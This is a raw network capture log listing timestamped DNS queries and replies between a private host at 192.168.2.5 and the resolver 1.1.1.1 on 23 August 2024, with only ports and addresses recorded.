Aug 23, 2024 18:43:03.736923933 CEST	53	56959	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.737013102 CEST	53	60537	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.737528086 CEST	53	61414	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.737842083 CEST	53	53287	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.737947941 CEST	53	52752	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.738820076 CEST	53	56006	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.739443064 CEST	53	52094	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.741302013 CEST	49364	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.741462946 CEST	58232	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.741626024 CEST	62852	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.743180990 CEST	59914	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.743196011 CEST	53	54536	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.743451118 CEST	51354	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.743823051 CEST	57929	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.744005919 CEST	52939	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.744149923 CEST	65098	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.744290113 CEST	60201	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.744479895 CEST	57413	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.744679928 CEST	59252	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.746109009 CEST	53	53766	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.750257969 CEST	53	54917	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.765007973 CEST	53	62740	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.765486002 CEST	53	49364	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.766196012 CEST	53	60201	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.766225100 CEST	53	62852	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.769408941 CEST	53	59914	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.769418001 CEST	53	51354	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.769428015 CEST	53	57413	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.769445896 CEST	53	65098	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.769738913 CEST	53	58232	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.769820929 CEST	53	52939	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.770122051 CEST	53	62223	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.772443056 CEST	53	60241	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.772546053 CEST	53	61171	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.776149035 CEST	61680	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.780978918 CEST	53	63857	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.789258003 CEST	53	53045	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.789659977 CEST	63695	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.793740988 CEST	53	57929	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.798367977 CEST	53	61850	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.798548937 CEST	53	60609	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.806190014 CEST	53	63695	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.841764927 CEST	53	59041	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.882235050 CEST	53	53466	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.890714884 CEST	53	55228	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.902164936 CEST	53	61342	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.945152998 CEST	53	61680	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.981477976 CEST	53	55175	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:04.002361059 CEST	53	59252	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:04.367557049 CEST	54494	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:04.400718927 CEST	53	54494	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:04.402476072 CEST	53	54494	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:04.439201117 CEST	65014	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:04.488106966 CEST	53	65014	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:04.488195896 CEST	53	65014	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.796789885 CEST	58622	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.798980951 CEST	58733	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.800812006 CEST	53702	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.802519083 CEST	54674	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.804316998 CEST	61624	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.806286097 CEST	62272	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.808192015 CEST	60858	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.809916019 CEST	64024	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.810070992 CEST	53	58733	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.812623978 CEST	58017	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.814306974 CEST	53903	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.816147089 CEST	57301	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.816224098 CEST	53	61624	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.818232059 CEST	50929	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.819396019 CEST	53	60858	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.820238113 CEST	60930	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.821754932 CEST	60083	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.822829008 CEST	53	58017	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.823281050 CEST	59314	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.826098919 CEST	53	53903	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.827125072 CEST	53	57301	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.828768969 CEST	53	50929	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.828898907 CEST	53	58622	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.831705093 CEST	53	60930	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.833802938 CEST	53	54674	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.833812952 CEST	53	59314	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.837779999 CEST	53	62272	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.855202913 CEST	53	60083	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.861810923 CEST	53	64024	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.924679995 CEST	62114	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.925075054 CEST	62779	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.925581932 CEST	54716	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.929527998 CEST	54861	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.930022001 CEST	62206	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.930253983 CEST	52508	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.930438995 CEST	58447	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.932519913 CEST	64043	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.932734013 CEST	62908	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.933109045 CEST	51093	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.933352947 CEST	59519	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.933604956 CEST	56421	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.933624983 CEST	53073	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.933837891 CEST	54967	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.934011936 CEST	49363	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.934083939 CEST	60656	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.934273005 CEST	50494	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.934447050 CEST	58669	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.934631109 CEST	56891	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.934712887 CEST	61737	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.934899092 CEST	53700	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.935096025 CEST	50602	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.935375929 CEST	56489	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.935411930 CEST	55994	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.935596943 CEST	51789	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.935790062 CEST	54829	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.935813904 CEST	53	62779	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.936141014 CEST	61701	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.936284065 CEST	53	62114	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.936461926 CEST	55437	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.936645031 CEST	61105	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.936939955 CEST	58424	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.937238932 CEST	53956	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.937593937 CEST	51996	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.937731981 CEST	50852	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.937900066 CEST	61092	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.938103914 CEST	58964	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.938265085 CEST	50081	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.938334942 CEST	60817	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.938487053 CEST	62315	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.938658953 CEST	55506	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.938915014 CEST	55595	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.939352989 CEST	59929	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.939479113 CEST	49357	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.939904928 CEST	62167	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.940624952 CEST	56682	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.940664053 CEST	57226	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.940886021 CEST	59126	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.941073895 CEST	65046	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.941448927 CEST	62025	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.941492081 CEST	53	58447	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.941502094 CEST	59100	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:05.944663048 CEST	53	51093	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.944864988 CEST	53	51789	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.944874048 CEST	53	53700	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.945316076 CEST	53	64043	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.945811987 CEST	53	53073	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.945821047 CEST	53	61737	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.946043015 CEST	53	50602	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.946738958 CEST	53	56489	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.947464943 CEST	53	49363	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.947896004 CEST	53	58424	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.947905064 CEST	53	54829	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.948142052 CEST	53	51996	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.948302984 CEST	53	55437	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.948775053 CEST	53	50852	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.948822021 CEST	53	55994	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.948867083 CEST	53	55506	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.949079037 CEST	53	60817	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.949320078 CEST	53	62315	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.949328899 CEST	53	59929	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.949579000 CEST	53	58964	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.950160027 CEST	53	49357	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.950396061 CEST	53	50081	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.950577021 CEST	53	62167	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.951597929 CEST	53	57226	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.952326059 CEST	53	62025	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.952671051 CEST	53	65046	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.961086988 CEST	53	54716	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.964397907 CEST	53	54861	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.964413881 CEST	53	62908	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.964706898 CEST	53	56421	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.969676971 CEST	53	61701	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.969818115 CEST	53	61092	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.969863892 CEST	53	61105	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.971236944 CEST	53	56682	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.973084927 CEST	53	53956	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.974518061 CEST	53	59126	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:05.974783897 CEST	53	55595	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.026139021 CEST	53	53702	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.087907076 CEST	53	62206	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.092300892 CEST	53	56891	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.095402956 CEST	53	60656	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.098948002 CEST	53	58669	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.134499073 CEST	53	50494	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.138880014 CEST	49594	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:06.207226992 CEST	53	49594	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.215157032 CEST	55391	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:06.254987001 CEST	53	54967	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.267570019 CEST	53	52508	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.274702072 CEST	53	59100	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.275737047 CEST	53	59519	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.307332039 CEST	63742	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:06.376097918 CEST	56702	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:06.379307032 CEST	55089	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:06.390331030 CEST	62470	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:06.440164089 CEST	53	55391	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.626286030 CEST	53	63742	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.697462082 CEST	53	56702	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.770872116 CEST	53	62470	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:06.843061924 CEST	53	55089	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:07.280024052 CEST	53764	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:07.473026037 CEST	52060	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:07.616444111 CEST	53	53764	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:08.049897909 CEST	53	52060	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.754394054 CEST	62268	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.755290985 CEST	49469	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.756052971 CEST	63210	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.756603003 CEST	53907	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.756628036 CEST	63045	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.757203102 CEST	58249	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.757242918 CEST	55677	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.757683039 CEST	51048	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.757719994 CEST	65310	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.758208990 CEST	60100	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.758503914 CEST	52636	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.758577108 CEST	58209	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.759017944 CEST	64232	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.759469986 CEST	50126	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.759530067 CEST	60437	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.759900093 CEST	51668	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.760351896 CEST	50406	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.760406971 CEST	58996	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.760837078 CEST	53672	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.760870934 CEST	49646	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.761420012 CEST	57414	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.761550903 CEST	61405	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.762053967 CEST	50170	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.762379885 CEST	65174	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.762453079 CEST	62951	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.762847900 CEST	56014	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.762904882 CEST	56605	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.763428926 CEST	57798	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.763752937 CEST	57958	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.763853073 CEST	57108	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.764173985 CEST	53944	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.764632940 CEST	51705	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.764992952 CEST	56170	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.765005112 CEST	52127	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.765178919 CEST	55566	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.766597986 CEST	59594	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.767851114 CEST	53	53907	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.767863035 CEST	53	65310	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.767991066 CEST	58259	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.768023014 CEST	55664	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.768220901 CEST	63870	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.768248081 CEST	55621	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.768362045 CEST	53	51048	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.768532991 CEST	57437	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.768784046 CEST	63610	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.768902063 CEST	50207	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.768984079 CEST	59395	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.769004107 CEST	53	55677	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.769145012 CEST	59051	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.769211054 CEST	50097	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.769361019 CEST	56602	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.769539118 CEST	65424	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.769539118 CEST	57318	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.769619942 CEST	56945	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.769725084 CEST	60967	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.769814968 CEST	50187	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.769885063 CEST	53	60100	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.769942999 CEST	50582	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.770055056 CEST	55037	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.770253897 CEST	49974	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.770551920 CEST	56482	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.770638943 CEST	65519	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.770778894 CEST	62649	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.770828009 CEST	64561	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.770970106 CEST	53	58996	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.771018028 CEST	51553	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.771034956 CEST	56155	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.771049023 CEST	53	53672	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.771284103 CEST	62223	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.771284103 CEST	62679	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.771483898 CEST	50598	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.771872044 CEST	53	51668	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.771883011 CEST	53	50126	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.771891117 CEST	53	50406	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.772188902 CEST	53	50170	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.772198915 CEST	53	64232	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.773230076 CEST	53	57798	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.773240089 CEST	53	57414	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.773869038 CEST	53	61405	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.774163008 CEST	53	62951	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.774560928 CEST	53	57108	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.774626017 CEST	53	57958	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.774902105 CEST	53	56014	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.775747061 CEST	53	53944	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.776384115 CEST	53	59594	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.778529882 CEST	53	55566	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.778940916 CEST	53	63870	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.780975103 CEST	53	56602	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.781492949 CEST	53	50207	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.781940937 CEST	53	50187	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.781949997 CEST	53	63610	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.781954050 CEST	53	65519	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.781961918 CEST	53	56945	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.782157898 CEST	53	51553	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.782166958 CEST	53	57318	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.782175064 CEST	53	50598	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.782185078 CEST	53	49974	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.782195091 CEST	53	62223	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.782203913 CEST	53	62679	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.782469988 CEST	53	55037	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.782808065 CEST	53	56155	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.786374092 CEST	53	49469	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.788158894 CEST	53	63210	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.791194916 CEST	53	63045	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.791635036 CEST	53	49646	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.791778088 CEST	53	60437	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.791934967 CEST	53	58209	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.792939901 CEST	53	65174	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.793102026 CEST	53	58249	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.793418884 CEST	53	56605	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.796916008 CEST	53	56170	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.799310923 CEST	53	51705	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.800405025 CEST	53	55664	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.800545931 CEST	53	59051	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.800853968 CEST	53	55621	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.801115990 CEST	53	52127	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.801390886 CEST	53	50582	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.801877022 CEST	53	64561	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.802596092 CEST	53	60967	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.802901030 CEST	53	50097	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.804023981 CEST	53	52636	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.804300070 CEST	53	58259	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.805196047 CEST	53	59395	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.805463076 CEST	53	65424	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.919461012 CEST	53	62268	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.929061890 CEST	53	57437	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.931258917 CEST	53	62649	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.935185909 CEST	53	56482	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.937071085 CEST	60243	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.938343048 CEST	55282	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.939555883 CEST	64443	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.941822052 CEST	55398	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.942936897 CEST	64242	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.943789959 CEST	55510	53	192.168.2.5	1.1.1.1
